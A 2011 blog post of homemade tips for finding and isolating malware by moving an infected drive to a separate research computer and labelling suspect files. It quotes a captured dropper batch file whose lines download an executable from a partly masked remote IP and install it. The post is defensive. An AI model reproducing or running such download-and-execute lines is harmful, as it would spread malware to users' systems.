by   May 10 2011   
A few tips and steps to finding your computer viruses and to setup your research computer to collect viruses. Posting a few tips on how to identify and find common viruses on your computer.

A few tips and steps to finding your computer viruses and to setup your research computer to collect viruses.

I'll be updating this for 2012 and rewording articles to cut down on that cross over search term "Research" which in many circlues means "Hack" but in this case it's "Research".

This works in reverse as well if you are looking to remove a hard to remove virus from an active system. I use many of these processes to disable and identify the delivery package which is for me the most important part. Once you learn how the virus was delivered you can work on preventing that type of delivery.

Posting a few tips on how to identify and find common viruses on your computer. Be careful if your anti-virus program hasn't removed everything or made things safe.

You can use any of your favorite AV programs to find viruses on your computer as long as you have access to the log reports and can actually access the infected files.

I find the best method after you have detected or downloaded a virus is to remove the drive from the infected computer.

If you use the dual boot, dual hard drive method you can skip this part.

Once you remove the hard drive from the computer that was infected take a moment and review a few things.
1. Remove the power cord and disconnect the monitor cable from your computer.
2. Remove the memory.
3. Remove the Bios Backup Battery.

Let all that be while you work on extracting your viruses from the hard drive you just removed.

Now, install the hard drive in a external enclosure and connect it to your Viology 101 computer. (Not your work computer please.)

Now start scanning for the virus in your attached drive.
When you see one popup browse over to the file using explorer and start renaming the files.

If you find:
G:\WINDOWS\Temp\42.tmp
Rename that file to:
G:\WINDOWS\Temp\42.tmp.Virus.txt

Always label files you suspect with the same extension and name so if you make a mistake or copy over good files you can find them quickly with a search. (Renaming MSHTA.EXE to MSHTA.EXE.VIRUS.TXT if you have a trashed GUI handle issue.)

Next start a text log of where the AV program fines the infected files.
Your AV program will most likely not find the files that delivered your virus so this is where you need to start looking.

Working Left to Right, Top to Bottom.
Start browsing your file folders.
C:\ or in our case G:If you see additional files that don't look like your classical files you should start making a note of things.

Example:
C:AUTOEXEC.BAT (Normal)
BOOT.INI (Normal)
¹É³ÇÍø_¹ÉÊÐÐÐÇé_ÈçºÎ³´¹É (Not so Normal)
aahic.exe (Not Normal)
psiefutv.exe (Not Normal)

You get the point.
When you see something out of wack label it with your .Virus.txt labeling.

Once you have finished with all your files you can then start opening them to see if you can find some information needed to clean out other areas of your computer.
Or you might find the paths to where it was installed.

The last example here is the t.bat file that was part of a program download that installed a 18 nasty applications.

t.bat.virus.txt
C:\WINDOWS\TEMP\par.exe http://220.196.x.x/ u3.exe C:\WINDOWS\TEMP\protect.exe
C:\WINDOWS\TEMP\protect.exe -install 02993

(Yes, the IP is from China and that u3.exe file is more headaches. Never click on IP address links!!! )

So now we know to look for par.exe and rename it par.exe.virus.txt and continue our discovery process.

Expect to take hours put once you do one the next one should be faster

 

 

A few tips and steps to finding your computer viruses and to setup your research computer to collect viruses. Posting a few tips on how to identify and find common viruses on your computer.